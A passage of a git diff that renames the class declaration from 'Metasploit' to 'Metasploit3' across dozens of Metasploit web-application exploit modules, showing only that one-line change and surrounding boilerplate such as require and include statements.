b/modules/exploits/unix/webapp/generic_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb index d63bf79243..5d3afc9353 100644 --- a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb +++ b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index d8e3a6d2ee..bc505ad66f 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/unix/webapp/graphite_pickle_exec.rb b/modules/exploits/unix/webapp/graphite_pickle_exec.rb index 4a2b6f103a..29ebbb1775 100644 --- a/modules/exploits/unix/webapp/graphite_pickle_exec.rb +++ b/modules/exploits/unix/webapp/graphite_pickle_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index d070d1943a..53b9e6911c 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index 159a78f211..8840dc855c 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 5eed7460f8..f76388a42d 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb index 92603757fa..ecfd1ac294 100644 --- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb index 3249bdbe52..6b495eed60 100644 --- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb +++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # application config.php is overwritten include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/instantcms_exec.rb b/modules/exploits/unix/webapp/instantcms_exec.rb index 8f8b0d20e0..0fb2359c31 100644 --- a/modules/exploits/unix/webapp/instantcms_exec.rb +++ b/modules/exploits/unix/webapp/instantcms_exec.rb @@ -1,7 +1,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index 8359d294f7..e2b2f8b485 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb index e049f30917..7836c4732d 100644 --- a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb +++ b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index 433356e15f..af1204f917 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb index ffaf82fa2c..a48ba48d99 100644 --- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb +++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 454707c406..5d2cb35756 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 989004a81a..5286bf927d 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb index 4f9ff8f64e..51c9a53ffa 100644 --- a/modules/exploits/unix/webapp/kimai_sqli.rb +++ b/modules/exploits/unix/webapp/kimai_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index a1b4155dfe..b68a39ed2e 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index 8003836d9e..8524edfb3a 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb +++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index b9b854e64d..ad270f3590 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb index 81d768744e..8179ffc36a 100644 --- a/modules/exploits/unix/webapp/mitel_awc_exec.rb +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb index 9013332793..1f0f109a81 100644 --- a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb +++ b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index a8205eb82c..3f92aa03d9 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index a03be54728..3f0ec69676 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index 6a582e2e95..dde396f3d6 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb index 3729806650..44a9e6123d 100644 --- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb +++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index 58ea83697b..8660cf678d 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index b3d59db130..e7d56fcd2f 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index 449fed46c8..8e91a2ef42 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index 96e70e6cea..df8f0518c8 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 7a2ece3151..25611c3bcb 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index 5cf731b7f4..d271d446fa 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 6d65ea96c7..d76318ede7 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index ea72e1c85c..c9afc417e0 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index b23d42d57f..51d6d0c8f9 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/pajax_remote_exec.rb b/modules/exploits/unix/webapp/pajax_remote_exec.rb index 4196dd206b..d53edeb6e2 100644 --- a/modules/exploits/unix/webapp/pajax_remote_exec.rb +++ b/modules/exploits/unix/webapp/pajax_remote_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 2021c9a45e..3c4ca54256 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index 773d1c322f..4c57758421 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 870196bdb1..960c8387dd 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index d29a093fe7..c8edda9b97 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index c91a8b6aa7..996a060a4b 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index bd4b0db52f..009305625b 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index 9e395b9a00..9775cd9fb0 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 1ee479a03f..71382a1f17 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/projectsend_upload_exec.rb b/modules/exploits/unix/webapp/projectsend_upload_exec.rb index 7298327f22..e01415cfb4 100644 --- a/modules/exploits/unix/webapp/projectsend_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectsend_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb index e573606b50..5e43183164 100644 --- a/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb +++ b/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index f1422ecc55..113f7cc419 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/seportal_sqli_exec.rb b/modules/exploits/unix/webapp/seportal_sqli_exec.rb index 05f81d3b63..8f8da55d8e 100644 --- a/modules/exploits/unix/webapp/seportal_sqli_exec.rb +++ b/modules/exploits/unix/webapp/seportal_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb index 7a95d1af01..4d18db356b 100644 --- a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 44670a1c2c..9a75e1d9cb 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb index 04aafff970..5575ae12fc 100644 --- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 56ffef3921..fdfed0a499 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb index 676eb5848a..06bd9ecd7c 100644 --- a/modules/exploits/unix/webapp/spip_connect_exec.rb +++ b/modules/exploits/unix/webapp/spip_connect_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb index ad9eef9f6c..a8303ca871 100644 --- a/modules/exploits/unix/webapp/squash_yaml_exec.rb +++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb index 9173f42b2d..a116da0fa5 100644 --- a/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb +++ b/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index e877ea0118..918ff7cfb7 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index 84b62ca665..04e6167531 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index 7fac1e1a66..a1ba47c228 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index 9c24bcf127..3f6e06931e 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb index 8d9a1e693f..817d0d3a3e 100644 --- a/modules/exploits/unix/webapp/trixbox_langchoice.rb +++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb @@ -6,7 +6,7 @@ # -*- coding: utf-8 -*- require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\w+)(?:;|$)/ diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index d019189c3d..ac13d101db 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 07513662ce..0e2e00d06c 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include 